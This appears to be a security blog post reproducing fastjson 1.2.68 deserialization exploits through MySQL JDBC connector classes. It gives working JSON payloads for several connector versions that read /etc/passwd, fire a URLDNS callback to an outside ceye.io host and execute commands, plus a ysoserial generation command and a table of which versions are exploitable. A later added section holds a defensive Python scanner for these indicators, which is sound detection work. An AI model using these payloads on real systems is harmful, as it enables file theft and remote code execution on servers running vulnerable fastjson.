fastjson high-version JDBC exploitation

Preface

This post collects and reproduces the fastjson high-version JDBC exploitation techniques published on the Internet.

fastjson 1.2.68 and JDBC

With mysql-connector-java = 8.0.19:
File read

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "10.211.55.2"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "10.211.55.2",
                "user": "fileread_/etc/passwd",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

URLDNS

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "10.211.55.2"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "10.211.55.2",
                "user": "deser_URLDNS_http://xxs.decftp.ceye.io",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

Command execution

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "10.211.55.2"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "10.211.55.2",
                "user": "test",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

With mysql-connector-java = 6.0.2, the PoC is

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
    "proxy": {
        "connectionString": {
            "url": "jdbc:mysql://10.211.55.2:3306/test?allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=fileread_/etc/passwd"
        }
    }
}

Generate the payload with

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1  "open -a Calculator"  > payload


Then use fake-mysql-gui-0.0.4.jar to start listening on the port; command execution is possible.


With mysql-connector-java between 5.1.11 and 5.1.48, the PoC is

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "127.0.0.1",
    "portToConnectTo": 3306,
    "info": {
        "user": "fileread_/etc/passwd",
        "password": "3306",
        "maxAllowedPacket": "655360",
        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "NUM_HOSTS": "1"
    },
    "databaseToConnectTo": "dbname",
    "url": ""
}
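
As an added example (not code from the original post, and not part of fastjson or the MySQL connector), the following Python script scans JSON of the three PoC shapes above for the indicators a defender can key on: a duplicated "@type" in one object, the "java.lang.AutoCloseable" expected-type anchor, MySQL connector class names, and the autoDeserialize / allowLoadLocalInfile / interceptor settings, whether they appear as object properties (the 8.0.19 and 5.1.x shapes) or inside a "jdbc:" URL string (the 6.0.2 shape). The indicator lists, the verdict rule, the host name and the sample payloads are constructed assumptions for illustration, not an exhaustive blocklist.

```python
"""Risk-indicator scanner for fastjson JSON that builds JDBC driver objects.

Added example, not code from the original post. Indicator lists and the
suspicion rule are assumptions; sample payloads are constructed to mirror
the PoC shapes in the post, with placeholder host names.
"""
import json
from urllib.parse import parse_qs, urlsplit

TYPE_KEY = "@type"  # fastjson's polymorphic type hint

# Expected-type anchor used as the first @type in the post's payloads (assumed list).
EXPECTED_TYPE_ANCHORS = {"java.lang.AutoCloseable"}

# Class-name prefixes of MySQL connector types (assumed list; extend per driver).
JDBC_CLASS_PREFIXES = ("com.mysql.cj.jdbc.", "com.mysql.cj.conf.", "com.mysql.jdbc.")

# Connector settings that switch on the behaviours the post relies on.
RISKY_PROPERTIES = {
    "autoDeserialize": "client-side Java deserialization of server-sent data",
    "allowLoadLocalInfile": "LOAD DATA LOCAL file read",
    "queryInterceptors": "server-status interceptor (8.x) that feeds autoDeserialize",
    "statementInterceptors": "server-status interceptor (5.x/6.x) that feeds autoDeserialize",
}


class Obj(list):
    """A JSON object kept as an ordered list of (key, value) pairs, so a duplicate @type survives."""


def _scan_jdbc_url(url, path):
    """Flag risky parameters in a jdbc:mysql://host/db?k=v URL string."""
    query = urlsplit(url[len("jdbc:"):]).query  # strip "jdbc:" so urlsplit sees mysql://
    return [(path, "risky url parameter", f"{k}={v[0]}")
            for k, v in parse_qs(query).items() if k in RISKY_PROPERTIES]


def _walk(node, path, findings):
    if isinstance(node, Obj):  # must be tested before list, Obj is a list subclass
        type_values = [v for k, v in node if k == TYPE_KEY]
        if len(type_values) > 1:  # expected-class trick: the first @type sets the expected type
            findings.append((path or "$", "duplicate @type", " -> ".join(map(str, type_values))))
        for key, value in node:
            child = f"{path}.{key}" if path else key
            if key == TYPE_KEY and isinstance(value, str):
                if value in EXPECTED_TYPE_ANCHORS:
                    findings.append((child, "expected-type anchor", value))
                if value.startswith(JDBC_CLASS_PREFIXES):
                    findings.append((child, "jdbc class", value))
            if key in RISKY_PROPERTIES:
                findings.append((child, "risky property", f"{key}={value}"))
            if isinstance(value, str) and value.startswith("jdbc:"):
                findings.extend(_scan_jdbc_url(value, child))
            _walk(value, child, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)


def scan(payload):
    """Return a list of (json path, finding kind, detail) tuples."""
    findings = []
    _walk(json.loads(payload, object_pairs_hook=Obj), "", findings)
    return findings


def is_suspicious(payload):
    """Verdict rule (assumed): any connector class or risky connector setting in the JSON."""
    kinds = {kind for _, kind, _ in scan(payload)}
    return bool(kinds & {"jdbc class", "risky property", "risky url parameter"})


def type_seen_by_dict_parser(payload):
    """What a plain-dict filter sees as @type: only the last duplicate survives."""
    return json.loads(payload).get(TYPE_KEY)


# Constructed samples mirroring the 8.0.19 (properties) and 6.0.2 (URL) shapes.
SAMPLE_PROPERTIES = """{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
  "proxy": {"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "connectionUrl": {"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
      "masters": [{"host": "db.example.internal"}], "slaves": [],
      "properties": {"host": "db.example.internal", "user": "app",
        "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true", "allowLoadLocalInfile": "true"}}}
}"""

SAMPLE_URL = """{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
  "proxy": {"connectionString": {"url": "jdbc:mysql://db.example.internal:3306/test?allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=app"}}
}"""

SAMPLE_BENIGN = '{"user": {"name": "alice", "roles": ["reader"]}, "page": 2}'

if __name__ == "__main__":
    for sample in (SAMPLE_PROPERTIES, SAMPLE_URL, SAMPLE_BENIGN):
        print(is_suspicious(sample), scan(sample))
```

The object_pairs_hook matters: a filter that inspects a plain dict sees only the second "@type" and never the AutoCloseable anchor that makes the trick work on 1.2.68, and it is why type_seen_by_dict_parser reports the concrete connector class alone. The scanner is a compensating control at the edge; the fix in the application is to keep autoType disabled (fastjson 1.2.68 adds safeMode for this) and never to let request data reach connector properties.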

Summary

fastjson 1.2.36 through 1.2.68              File read   URLDNS   Command execution
mysql-connector-java > 8.0.19               √           x        x
mysql-connector-java = 8.0.19               √           √        √
mysql-connector-java < 8.0.19               x           x        x
mysql-connector-java = 6.0.2                √           √        √
mysql-connector-java = 6.0.3                √           √        √
5.1.10 < mysql-connector-java <= 5.1.48     √           √        √